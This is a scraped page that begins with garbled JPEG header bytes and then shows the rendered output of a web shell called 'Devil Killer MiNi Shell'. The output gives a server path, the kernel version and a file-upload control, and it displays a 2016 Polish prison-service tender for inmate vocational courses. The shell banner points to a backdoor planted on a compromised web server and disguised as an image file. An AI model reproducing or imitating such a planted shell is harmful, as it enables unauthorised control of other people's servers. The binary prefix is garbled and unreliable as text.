JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160830/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160830/303643-N-2016.html

      <div class="divRow_xforms">
         <div>Ogłoszenie nr 303643 - 2016
              z dnia 2016-08-30 r.</div>
         <div style="text-align: center" class="headerMedium_xforms">
            Warszawa: 
    Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie  szkoleń dla osób osadzonych w dziewięciu jednostkach inspektoratu warszawskiego w ramach projektu Podniesienie kwalifikacji zawodowych więźniów w celu ich powrotu na rynek pracy po zakończeniu osób wolności  w ramach Programu Operacyjnego Wiedza Edukacja Rozwój 2014-2020,  finansowanego ze środków Funduszy Europejskich.
            <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
         </div>
         <div>
            <b>Zamieszczanie ogłoszenia:</b>
            obowiązkowe
         </div>
         <div>
            <b>Ogłoszenie dotyczy:</b>
            zamówienia publicznego
         </div>
         <div>
            <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej</b>
            <br />
            <div style="padding-left: 20px">tak</div>
            <br />
            <b>Nazwa projektu lub programu</b>
            <br />
            Projekt Podniesienie kwalifikacji zawodowych więźniów w celu ich powrotu na rynek pracy po zakończeniu osób wolności  w ramach Programu Operacyjnego Wiedza Edukacja Rozwój 2014-2020
         </div>
         <div>
            <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych</b>
            <br />
            <div style="padding-left: 20px">tak</div>
            <br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br />
            30%
         </div>
         <div style="text-align: left" class="headerLarge_xforms">
            <u>SEKCJA I: ZAMAWIAJĄCY</u>
         </div>
         <div style="padding-left: 20px">
            <b>Postępowanie przeprowadza centralny zamawiający</b>
            <br />
            <div style="padding-left: 20px">nie</div>
            <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania</b>
            <br />
            <div style="padding-left: 20px">nie</div>
            <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b>
            <br />
            <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b>
            <br />
            <div style="padding-left: 20px">nie</div>
            <br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br />
            <br />
            <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej</b>
            <br />
            <div style="padding-left: 20px">nie</div>
            <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b>
            <br />
            <b>Informacje dodatkowe:</b>
            <br />
         </div>
         <div style="padding-left: 20px;">
            <div style="text-align: left">
               <b>I. 1) NAZWA I ADRES:</b>
               Okręgowy Inspektorat Służby Więziennej w Warszawie, krajowy numer identyfikacyjny
              1213069600000, ul.
              ul. Wiśniowa 
              ,
              02520  
              Warszawa, woj.
              mazowieckie, państwo
              , tel.
              226 408 045, e-mail
              oisw_warszawa@sw.gov.pl, faks
              226 408 024.
               <br />
               Adres strony internetowej (URL): www.sw.gov.pl
               <br />
               Adres profilu nabywcy:

                www.sw.gov.pl
               <br />
            </div>
            <div style="text-align: left">
               <b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>
               Administracja rządowa terenowa
            </div>
            <div style="text-align: left">
               <b>
                  I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA
                  <i>(jeżeli dotyczy)</i>
                  :
               </b>
               <div style="padding-left: 20px">
                  Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                  <br />
               </div>
            </div>
            <div style="text-align: left">
               <b>I.4) KOMUNIKACJA:</b>
               <br />
               <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b>
               <div style="padding-left: 20px">
                  nie
                  <br />
               </div>
               <br />
               <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia</b>
               <div style="padding-left: 20px">
                  tak
                  <br />
                  www.sw.gov.pl
               </div>
               <br />
               <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem</b>
               <div style="padding-left: 20px">
                  nie
                  <br />
               </div>
               <br />
               <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b>
               <br />
               <b>Elektronicznie</b>
               <div style="padding-left: 20px">
                  nie
                  <br />
                  adres
                  <br />
               </div>
               <br />
               <div style="padding-left: 20px">
                  <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b>
                  <br />
                  nie
                  <br />
                  <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b>
                  <br />
                  tak
                  <br />
                  Inny sposób:
                  <br />
                  1.	Z zastrzeżeniem pkt XI ust. 5 SIWZ, w niniejszym postępowaniu o udzielenie zamówienia komunikacja między zamawiającym a wykonawcami, w szczególności składanie oświadczeń, odbywa się za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 r.  Prawo pocztowe (Dz. U. z 2012 r. poz. 1529 oraz z 2015 r. poz. 1830), osobiście, za pośrednictwem posłańca, faksu lub przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2013 r. poz. 1422, z 2015 r. poz. 1844 oraz z 2016 r. poz. 147 i 615).
                  <br />
                  Adres:
                  <br />
                  OKRĘGOWY INSPEKTORAT SŁUŻBY WIĘZIENNEJ W WARSZAWIE ul.Wiśniowa 50  02-520 Warszawa
               </div>
               <br />
               <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b>
               <div style="padding-left: 20px">
                  nie
                  <br />
                  Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                  <br />
               </div>
            </div>
         </div>
         <div style="text-align: left" class="headerLarge_xforms">
            <u>SEKCJA II: PRZEDMIOT ZAMÓWIENIA</u>
         </div>
         <div style="padding-left: 20px;">
            <div style="text-align: left">
               <br />
               <b>II.1) Nazwa nadana zamówieniu przez zamawiającego:</b>
               Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie  szkoleń dla osób osadzonych w dziewięciu jednostkach inspektoratu warszawskiego w ramach projektu Podniesienie kwalifikacji zawodowych więźniów w celu ich powrotu na rynek pracy po zakończeniu osób wolności  w ramach Programu Operacyjnego Wiedza Edukacja Rozwój 2014-2020,  finansowanego ze środków Funduszy Europejskich.
               <br />
               <b>Numer referencyjny:</b>
               <br />
               <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny</b>
               <br />
               <div style="padding-left: 20px; text-align: justify">nie</div>
               <br />
               <b>II.2) Rodzaj zamówienia:</b>
               usługi
               <br />
               <b>II.3) Informacja o możliwości składania ofert częściowych</b>
               <br />
               Zamówienie podzielone jest na części:
               <br />
               <div style="padding-left: 20px">Nie</div>
               <br />
               <br />
               <b>II.4) Krótki opis przedmiotu zamówienia</b>
               <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i>
               <b>a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>
               1. Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie  szkoleń dla osób osadzonych w dziewięciu jednostkach inspektoratu warszawskiego w ramach projektu Podniesienie kwalifikacji zawodowych więźniów w celu ich powrotu na rynek pracy po zakończeniu osób wolności  w ramach Programu Operacyjnego Wiedza Edukacja Rozwój 2014-2020,  finansowanego ze środków Funduszy Europejskich.

    2. Informacje szczegółowe:
    1) Szkolenie przewidziane jest dla 170 osób: 17 grup - każda po 10  osób.
    2) Czas trwania szkolenia do 280 godz. dydaktycznych (czas trwania 1 godziny dydaktycznej: 45 min.) w ciągu 40 dni. Zajęcia powinny odbywać się od poniedziałku do piątku w godzinach od 8.30 do 15.30
    3) Miejsce przeprowadzenia zajęć   Pomieszczenia lekcyjne  i teren do zajęć praktycznych niżej wymienionych jednostek podległych Okręgowemu Inspektoratu Służby Więziennej w Warszawie :
    a) Areszt Śledczy Warszawa Mokotów  ul. Rakowiecka 37  02-521 Warszawa Tel./Fax: (22) 640-80-00 / 849-04-04
    b) Areszt Śledczy Warszawa Białołęka ul.Ciupagi 1 03-016 Warszawa Tel./Fax: (22) 321-76-50 / (22) 811-15-37;
    c) Areszt Śledczy Warszawa Służewiec ul. Kłobucka 5 02-699 Warszawa Tel./Fax: (22) 847-33-41 / (22) 843-73-66;
    d) Areszt Śledczy Warszawa Grochów ul.Chłopickiego 71 A 04-275 Warszawa Tel./Fax: (22) 610-55-41 / (22) 673-45-01 ;
    e) Areszt Śledczy Grójec ul. Armii Krajowej 21 05-600 Grójec Tel./Fax: (48) 664-20-52 / (48) 664-27-25 ;
    f) Areszt Śledczy Radom ul. Wolanowska 120 26-600 Radom Tel./Fax: (48) 383-70-00 / (48) 383-71-03 ;;
    g) Zakład Karny Warszawa Białołęka ul. Ciupagi 1B  03-016 Warszawa Tel./Fax: (22) 27-97-300 / (22) 27-97-321  ;
    h) Zakład Karny Siedlce ul. Piłsudskiego 47 08-110 Siedlce Tel./Fax: (25) 785-13-00 / (25) 785-13-30 ;
    i) Zakład Karny Żytkowice  Żytkowice 26-930 Garbatka  Letnisko Tel./Fax: (48) 62-11-250/ (48) 61-46-030;
    j) Oddział Zewnętrzny Stawiszyn Aresztu Śledczego Grójec Stawiszyn 31 26-800 Białobrzegi Tel./Fax: tel. (48) 613-59-22 / (48) 613-59-24;
    k) Oddział Zewnętrzny Popowo Zakładu Karnego Warszawa Białołęka ul. Nadbużańska 39 07-203 Popowo Parcele Tel./Fax: (29) 742-17-36 / (22) 782-61-02 ;
    l) Oddział Zewnętrzny Bemowo Aresztu Śledczego Warszawa Białołęka ul. Kocjana 3 01-473 Warszawa Tel./Fax: (22) 328-60-80 / (22) 328-60-84
    m) Oddział Zewnętrzny Pionki  Zakładu Karnego  Żytkowice Pionki 26-670 Pionki Tel./Fax: (48) 385-25-12

    4) Program szkolenia obligatoryjnie powinien uwzględnić programy dla niżej podanych kursów :
    a) 1 kurs zawodowy murarz  tynkarz (711204- kod zawodu Min. R.P.i P.S.) przeprowadzony w Areszcie Śledczym Warszawa Mokotów ;
    b) 1 kurs zawodowy -spawacz (721204) przeprowadzony w Zakładzie Karnym Siedlce
    c) 1 kurs zawodowy -asystent osoby niepełnosprawnej (341201) w Zakładzie Karnym Siedlce
    d) 1 kurs zawodowy  kucharz (512001) w Areszcie Śledczym Grójcu
    e)  1 kurs zawodowy  kucharz (512001) w Oddziale Zewnętrznym Stawiszyn Aresztu Śledczego w Grójcu;
    f) 1 kurs zawodowy  opiekun osoby starszej  (341202) w Areszcie Śledczym Warszawa Służewiec;
    g) 1  kurs zawodowy- fryzjer (514101) w Areszcie Śledczym Warszawa Służewiec;
    h) 1  kurs zawodowy brukarz (711205) w Oddziale Zewnętrznym Bemowo Aresztu Śledczego Warszawa Białołęka;
    i) 1  kurs zawodowy - murarz  tynkarz (711204) w  Areszcie Śledczym Warszawa Białołęka;
    j) 1  kurs zawodowy  dekarz (712101) w Areszcie Śledczym Warszawa Grochów;
    k)1  kurs zawodowy  kucharz małej gastronomii (512001) w Areszcie Śledczym Warszawa Grochów;
    l) 1  kurs zawodowy- ślusarz (722204) w Areszcie Śledczym Radom;
    m) 1  kurs zawodowy- malarz (713102) w Zakładzie  Karnym Warszawa Białołęka;
    n) 1 kurs zawodowy- glazurnik (712202) w Zakładzie  Karnym Warszawa Białołęka;
    o) 1 kurs zawodowy- hydraulik  (712601) w Oddziale Zewnętrznym Popowo Zakładu  Karnego Warszawa Białołęka;
    p) 1 kurs zawodowy- kucharz (512001)w Zakładzie  Karnym Żytkowice;
    r)  1 kurs zawodowy- glazurnik (712202) w  Oddział Zewnętrznym Pionki  Zakładu Karnego  Żytkowice .
               <br />
               <br />
               <b>II.5) Główny kod CPV:</b>
               80500000-8
               <br />
               <br />
               <b>II.6) Całkowita wartość zamówienia</b>
               <i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>
               :
               <br />
               Wartość bez VAT:
               <br />
               Waluta:
               <br />
               <div style="padding-left: 20px">
                  <br />
                  <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i>
               </div>
               <br />
               <b>II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:</b>
               nie
               <br />
               <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b>
               <div style="padding-left: 20px">
                  data zakończenia: 09/12/2016
                  <br />
               </div>
               <br />
               <b>II.9) Informacje dodatkowe:</b>
            </div>
         </div>
         <div style="text-align: left" class="headerLarge_xforms">
            <u>SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</u>
         </div>
         <div style="padding-left: 20px;">
            <div style="text-align: left">
               <b>III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU</b>
               <br />
               <div style="padding-left: 20px">
                  <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b>
                  <br />
                  Określenie warunków:
                
    1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy :

    a) są wpisani do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy  ze względu na siedzibę instytucji szkoleniowej  art. 20 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (t. j. Dz. U. z 2008 r. Nr 69, poz. 415, z późn. zm.).

    Zamawiający uzna, że warunek określony w tym  został spełniony w sytuacji, gdy Wykonawca złoży wraz z ofertą dokument potwierdzający wpis do rejestru instytucji szkoleniowych.
                  <br />
                  Informacje dodatkowe
                  <br />
                  <b>III.1.2)  Sytuacja finansowa lub ekonomiczna</b>
                  <br />
                  Określenie warunków:
                  <br />
                  Informacje dodatkowe
                  <br />
                  <b>III.1.3) Zdolność techniczna lub zawodowa</b>
                  <br />
                  Określenie warunków:
                  <br />
                  Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                  <br />
                  Informacje dodatkowe:
               </div>
               <b>III.2) PODSTAWY WYKLUCZENIA</b>
               <br />
               <div style="padding-left: 20px">
                  <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b>
                  <br />
                  <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                  <br />
               </div>
               <b>III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI</b>
               <br />
               <div style="padding-left: 20px">
                  <b>Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu</b>
                  <br />
                  tak
                  <br />
                  <b>Oświadczenie o spełnianiu kryteriów selekcji</b>
                  <br />
                  nie
               </div>
               <b>III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:</b>
               <br />
               <div style="padding-left: 20px" />
               <b>III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP</b>
               <br />
               <div style="padding-left: 20px">
                  <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b>
                  <br />
                  1. Na potwierdzenie spełniania warunków, o których mowa w art. 22 ust. 1 ustawy Pzp , wykonawca składa do oferty następujące dokumenty:
    a) wpis do rejestru instytucji szkoleniowych;
    b) dokumenty potwierdzające procentowy wskaźnik, nie mniejszy niż 30%, osób pozbawionych wolności lub zwalnianych z zakładów karnych, o których mowa w ustawie z dnia 6 czerwca 1997 roku  Kodeks Karny Wykonawczy (Dz. U. poz. 557, z późn. zm.) mających trudności w integracji ze środowiskiem.
    c) oświadczenia, że wykonawca spełnia warunki określone w art.22 ust.1 oraz niepodlegania wykluczeniu z postępowania o udzielenie zamówienia na mocy art. 24 ust.1 ustawy  Prawo zamówień publicznych. Oświadczenia stanowią załączniki nr 2 i 3.
                  <br />
                  <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b>
                  <br />
               </div>
               <b>III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP</b>
               <br />
               <div style="padding-left: 20px" />
               <b>III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)</b>
               <div style="padding-left: 20px">2. Oprócz ww. oświadczenia i dokumentów, wykonawca w celu wykazania braku podstaw                             do wykluczenia z postępowania o udzielenie zamówienia w okolicznościach, o których stanowi art. 24 ust. 1 ustawy Pzp zobowiązany jest złożyć następujące dokumenty:
    a)   informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy oraz, odnośnie  skazania  za  wykroczenie  na  karę  aresztu,  w zakresie  określonym  przez  zamawiającego  na  podstawie  art. 24 ust. 5 pkt 5 i 6 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu;
    b)   zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków,  wystawionego  nie  wcześniej  niż  3 miesiące  przed  upływem  terminu  składania  ofert  albo  wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
    c)   zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;</div>
            </div>
         </div>
         <div style="text-align: left" class="headerLarge_xforms">
            <u>SEKCJA IV: PROCEDURA</u>
         </div>
         <div style="padding-left: 20px;">
            <div style="text-align: left">
               <b>IV.1) OPIS</b>
               <br />
               <b>IV.1.1) Tryb udzielenia zamówienia:</b>
               przetarg nieograniczony
               <br />
               <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b>
               <div style="padding-left: 20px">nie</div>
               <br />
               <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b>
               <div style="padding-left: 20px">nie</div>
               <br />
               <b>IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:</b>
               <div style="padding-left: 20px">
                  nie
                  <br />
                  Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                  <br />
                  nie
                  <br />
                  Informacje dodatkowe:
                  <br />
               </div>
               <br />
               <b>IV.1.5.) Wymaga się złożenia oferty wariantowej:</b>
               <div style="padding-left: 20px">
                  nie
                  <br />
                  Dopuszcza się złożenie oferty wariantowej
                  <br />
                  nie
                  <br />
                  Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                  <br />
                  nie
               </div>
               <br />
               <b>IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</b>
               <br />
               <i>(przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)</i>
               <div style="padding-left: 20px">
                  Liczba wykonawców  
                  <br />
                  Przewidywana minimalna liczba wykonawców
                  <br />
                  Maksymalna liczba wykonawców  
                  <br />
                  Kryteria selekcji wykonawców:
                  <br />
               </div>
               <br />
               <b>IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:</b>
               <div style="padding-left: 20px">
                  Umowa ramowa będzie zawarta:
                  <br />
                  <br />
                  Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                  <br />
                  nie
                  <br />
                  Informacje dodatkowe:
                  <br />
                  <br />
                  Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                  <br />
                  nie
                  <br />
                  Informacje dodatkowe:
                  <br />
                  <br />
                  W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                  <br />
                  nie
                  <br />
                  Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                  <br />
                  nie
               </div>
               <br />
               <b>IV.1.8) Aukcja elektroniczna</b>
               <br />
               <b>Przewidziane jest przeprowadzenie aukcji elektronicznej</b>
               <i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem)</i>
               nie
               <br />
               <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej:</b>
               <br />
               <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b>
               <br />
               nie
               <br />
               Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
               <br />
